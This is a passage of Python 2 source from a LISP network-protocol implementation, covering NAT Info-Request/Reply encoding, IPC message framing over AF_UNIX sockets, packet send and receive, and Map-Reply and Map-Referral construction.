# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
        # Add hostname as a null-terminated string with AFI 17 (LISP_AFI_NAME).
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword, byte-swap it on little-endian (x86) hosts, and convert
# it to an ASCII hex string, zero-filling any longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
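#
# Worked example (hypothetical values, assuming lisp_hex_string() returns the
# bare lowercase hex digits): for SHA-1-96, auth1 and auth2 are zero-filled to
# 16 hex characters and auth3 to 8, so auth3 = 0x1a2b becomes "00001a2b" and
# the concatenated auth-data is 40 hex characters (160 bits). For SHA-256-128,
# all four longwords zero-fill to 16 characters, giving 64 hex characters
# (256 bits).
#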
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
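#
# Usage sketch (hypothetical addresses): a numeric port string opens a network
# socket, a non-numeric string opens an AF_UNIX datagram socket bound to that
# path name:
#
#   ipv4_sock = lisp_open_listen_socket("0.0.0.0", "4342")
#   ipc_sock = lisp_open_listen_socket("", "lisp-itr")
#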
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be sourced from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for an API message. Note this API IPC message must
# have the same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
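#
# Example IPC strings the builders above produce (hypothetical values: a
# 3-byte payload "abc" from source "lisp-etr", port 4342):
#
#   lisp_packet_ipc("abc", "lisp-etr", 4342) -> "packet@3@lisp-etr@4342@abc"
#   lisp_command_ipc("abc", "lisp-etr")      -> "command@3@lisp-etr@@abc"
#   lisp_api_ipc("lisp-etr", "abc")          -> "api@3@lisp-etr@@abc"
#
# Note the double @ denoting a null port in the command and api variants.
#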
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in segments (1500 bytes, or 9000 for control packets) since the
# socket interface will not allow larger messages. And socket.setsockopt()
# won't allow us to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a space after every 4 bytes (8 hex characters) of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
    #endwhile
return(new)
#enddef
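#
# Worked example: lisp_format_packet("\x60\x00\x00\x01\xde\xad\xbe\xef")
# hexlifies the buffer and groups it into 8-hex-character words, returning
# "60000001 deadbeef " (the loop may append a few trailing spaces because
# 'length' starts at twice the hexlified length).
#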
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 255)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Reassemble segments when a received IPC message is larger than what the
# socket interface can deliver in one recvfrom() call.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
    # If the total length equals what we have already received, we have the
    # entire packet in one segment. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@") between them. This is a
# bit-stuffing procedure. Only look at array elements with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
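#
# Worked example: a Map-Notify whose first payload byte is 0x40 arrives as
# IPC "packet@4@lisp-ms@4342@\x40ABC". split("@") yields ["packet", "4",
# "lisp-ms", "4342", "", "ABC"], so the payload segments ["", "ABC"] are
# rejoined by lisp_bit_stuff() with 0x40 to recover "\x40ABC".
#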
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when a split does not yield at least 4 fields, we are receiving a
# fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
        # This is a packet received on the network. If it was fragmented at
        # the sender, then IP did it, so it is assembled into a complete
        # datagram in this system.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
            # ASCII), we would confuse the IPC separator with real data.
            # So go to the payload and put back 0x40 where split() separated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
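#
# Return-value sketch for lisp_receive(): a network socket read returns
# ["packet", <source>, <port>, <packet-buffer>], an internal socket read
# returns [<opcode>, <source>, <port>, <buffer>] where <opcode> is one of
# "packet", "command", "api", or "data-packet", and a socket error returns
# ["", "", "", ""].
#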
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
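#
# Dispatch summary for lisp_parse_packet(), as coded above:
#
#   LISP_MAP_REQUEST    -> lisp_process_map_request()
#   LISP_MAP_REPLY      -> lisp_process_map_reply()
#   LISP_MAP_REGISTER   -> lisp_process_map_register()
#   LISP_MAP_NOTIFY     -> lisp_process_multicast_map_notify() and/or
#                          lisp_process_map_notify()
#   LISP_MAP_NOTIFY_ACK -> lisp_process_map_notify_ack()
#   LISP_MAP_REFERRAL   -> lisp_process_map_referral()
#   LISP_NAT_INFO       -> lisp_process_info_reply() or
#                          lisp_process_info_request()
#   LISP_ECM            -> lisp_process_ecm()
#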
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
keys, enc, auth, mr_ttl=-1):
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
for rloc_entry in rloc_set:
rloc_record = lisp_rloc_record()
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs):
rloc_record.local_bit = True
rloc_record.probe_bit = rloc_probe
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
return(packet)
#enddef
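#
# Usage sketch: a negative Map-Reply is built by passing an empty RLOC-set,
# as lisp_send_negative_map_reply() does further below:
#
#   packet = lisp_build_map_reply(eid, group, [], nonce,
#       LISP_NATIVE_FORWARD_ACTION, 15, False, None, False, False)
#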
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
    # we are an ETR not behind a NAT, we want to return the RLOC-probe
    # Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if (public and lisp_rtr_list.has_key(rtr)):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, True, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
